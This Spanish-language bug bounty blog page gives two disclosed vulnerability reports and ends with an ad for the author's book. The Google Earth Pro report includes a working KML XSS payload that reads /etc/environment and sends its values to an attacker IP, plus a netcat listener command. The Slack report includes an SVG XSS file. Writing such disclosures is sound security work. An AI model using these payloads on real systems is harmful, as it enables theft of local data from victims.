Hola a todos. Ha pasado un tiempo desde mi última publicación, pero estoy de regreso. Quiero contarles una historia muy breve sobre uno de mis últimos errores y cómo logré exfiltrar las variables locales de /etc/environment en la aplicación de escritorio de Google Earth Pro en Linux.

Si estás interesado en reportes 100% reales de Bug Bounty, por favor mira mi libro Bug Bounty en Español

Extraído del informe de Google VRP: (el informe real de Google VRP)

Resumen: Variables locales de archivo /etc/enviroment exfiltradas en la aplicación de escritorio Linux Google Earth Pro

Pasos para reproducir:

1.- Descarga e instala la última aplicación Google Earth Pro Desktop para macOS (7.3.3.7786 64-bit / .deb)

2.- Pon tu servidor atacante a la escucha en cualquier puerto con netcat, en mi caso el puerto 80:

 localh0st:~ user$ sudo nc -l -p 80

3.- Abre el archivo adjunto etc_environment.kml y modifica la parte donde está CDATA y pon tu IP del servidor atacante y guárdalo. (extracto de ese archivo y código XSS real):

<Placemark>                                                                        <name>placemark</name><description>                                                                                  <![CDATA[                                                                                           <script src=file:../../../../../../../etc/environment></script>                                                                                            <script>                                                                                    document.write('XSS fired :-)<br>');                                                                       document.write('Location: ' + location.href + '<br>');                                       document.write('<br>PATH var = ' + PATH);                                          document.write('<br>JAVA_HOME var = ' + JAVA_HOME);                                                                   document.write('<img src=http://192.168.0.11/?path=' + PATH + '&java_home=' + JAVA_HOME + '>'); </script>                                                                                               ]]></description>

4.- Simplemente abre el archivo etc_environment.kml con un doble clic, una vez que vea el polígono rojo, haga clic en él para ver la descripción y el XSS se disparará, contiene las variables del archivo de sistema /etc/environment y las enviaría al servidor atacante

5.- Bingo.

Explicación: dado que podemos inyectar código HTML/js aleatorio, podemos “importar” archivos con la etiqueta de script, por ejemplo “<script src=file:///../../../../etc/enviroment></script>”, por lo que si el archivo tiene el formato js correcto, el navegador cargará cualquier contenido.

Ya que el formato común de /etc/environment es:

PATH="/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin" 
JAVA_HOME="/opt/jre/bin"

Esto en realidad se cargaría porque esas variables tienen el mismo formato que las variables de javascript ;-), además, dado que cualquier variable de entorno de Linux es tan predecible, podemos aplicar fuerza bruta a los nombres de variables más comunes y enviarlas al servidor atacante.

ACTUALIZACIÓN: También podrías exfiltrar todas las variables del archivo /etc/environment ya que “Object.keys(window)” cargaría cualquier variable declarada en el DOM (referencia de stack overflow)

Escenario de Ataque:

Cualquier atacante puede leer variables arbitrarias de /etc/environment en Linux en la aplicación Google Earth Pro Desktop a través de un XSS.

Cronología del Reporte:

• 23 de agosto de 2021: “Nice catch”, fallo aceptado (P4 → P3)
• 23 de agosto de 2021: Recibí un mensaje de Google de que el fallo no era un fallo, y que era un comportamiento esperado.
• 01 de septiembre de 2021: Envié un mensaje de aclaración y luego el problema se envió de nuevo a revisión.
• 09 de septiembre de 2021: Recompensa de $1,337 dlls.
• 03 de octubre de 2021: Recibí un mensaje de Google de que el informe de problemas se cerró sin proporcionar una solución (el estado “no se solucionará”) ¡¿Qué?! jajaja.

Bueno, eso es todo, si tienes alguna duda, comentario o sugerencia escríbeme aquí o en Twitter @omespino, nos leemos luego.

Hola a todos, ha pasado un tiempo desde mi última publicación, pero he vuelto, quiero contarles una breve historia sobre el programa de recompensas de errores de Slack y por qué siempre debes verificar las técnicas básicas de seguridad porque te sorprenderás, algunas veces funcionan.

Este articulo apareció primero en el libro Bug Bounty en Español

Título: XSS almacenado en https://files.slack.com/ aplicación iOS / navegadores iOS a través de xml / archivo svg.

Producto / URL: Aplicación Slack iOS / navegadores iOS

Reporte enviado a través del programa hackerone de Slack (extracto del reporte original):

Hola, equipo de seguridad de Slack:

Encontré un XSS almacenado en https://files.slack.com/ mediante la aplicación de Slack de iOS / navegadores iOS a través de un archivo xml / svg.

Prueba de concepto:

1.- Inicia sesión en Slack y carga un archivo xml con el siguiente contenido en cualquier canal de slack (archivo slack-xss.xml adjunto):

<?xml version="1.0" encoding="utf-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>prompt(document.location)</script>
</svg>

2.- Busca el archivo xml en la aplicación iOS, haz clic en él para abrir la “Vista modo texto” y luego abre la opción “Ver en el navegador” y mira el XSS.

3.- También en la “Vista modo texto” puedes copiar el enlace para acceder rápidamente a ese archivo. (Ten en cuenta que si deseas enviar el enlace en algún canal slack, debes pegar el enlace copiado y agregar un espacio + cadena, por ejemplo, “https://files.slack.com/archivos-pri/XXXXXXXXX-XXXXXXXXX/ slack-xss.xml XSS”.

Algo importante a destacar es: en este momento tienes un ‘enlace mágico’ que apunta directamente al documento XML malicioso.

4.- Al abrir el enlace directamente en Safari de iOS aparece el XSS (si abres el enlace en cualquier navegador iOS como Safari, Firefox, Chrome, Opera, el XSS funciona, solo necesitas iniciar sesión en tu cuenta slack, solo funciona en iOS).

Impacto:

Un XSS almacenado permite que un atacante pueda insertar scripts maliciosos y arbitrarios en una página vulnerable, que luego se ejecutan cuando una víctima visualiza la página.

Entorno:

iPhone 6 – iOS v11.2.5
Safari Última versión
Google Chrome Última versión
Mi espacio de trabajo de slack / cuenta personal

Salón de la fama de Slack (Junio de 2019):
https://hackerone.com/slack/thanks/2019?type=team


Cronología del Reporte:
• 5 de febrero de 2018: Reporte enviado al equipo de Slack
• 13 de febrero de 2018: Recibí un mensaje del equipo de Slack que decía que el error había sido evaluado como nivel Crítico / Alto [High (7 ~ 8,9)]
• 14 de febrero de 2019: Recompensa de $ 1,000 dlls (Si, ¡Casi un año después! w0000t!)
• 5 de junio de 2019: Solucionado por el equipo de Slack

Descripción:

Con el paso de los fallos, he sido incluido en el salón de la fama de empresas como Google (investigador top 100 a nivel mundial), Microsoft, Facebook, Twitter, Slack, Netflix, Sony, Nokia, Telegram, etc.

La finalidad de compartir mis experiencias como aficionado en este escrito, es motivar a las personas y descubran que todos somos capaces de hackear a grandes empresas y llegar a lograr grandes recompensas, ningún logro es pequeño, si yo pude, tú también puedes.

En este libro tendrás la descripción de vulnerabilidades y su desarrollo paso a paso, fallos que acumularon más de
$$$$$ dólares en recompensas de manera legal, totalmente en español.

Tabla de Contenido:

Detalles:

Disponible en:

9.99 USD en amazon.com formato físico, 3.99 USD eBook kindle

https://www.amazon.com/dp/B09PHJRMCN

2.99 USD (59.99 MXN) en PayPal formato digital en PDF

Al finalizar tu compra con paypal recibirás el libro en digital en un periodo menor a 24 hrs.

1.99 USD con bitcoin BTC formato digital en PDF

3M7pmdp6sbjBLGUfY3snUUj7ZoFtxeFekJ

1.99 USD con ethereum ETH formato digital en PDF

0x4a9e86451ae756d978f320d88ba3cef01ecebc2a

Al finalizar tu compra con bitcoin envía un correo electrónico a om.espino+btc@gmail.com y recibirás el libro en digital en un periodo menor a 24 hrs.

Si tienes algún comentario o alguna duda, escríbeme un comentario directo en esta página, por correo om.espino+soporte@gmail.com o en buscamente en Twitter. (@omespino)

¿De qué trata el blog? Principalmente Bug Bounties, artículos de seguridad y artículos de CTF.

Si tienes algún comentario o alguna duda, escríbeme por mensaje directo en esta página, por correo hello@omespino.com o en Twitter. (@omespino)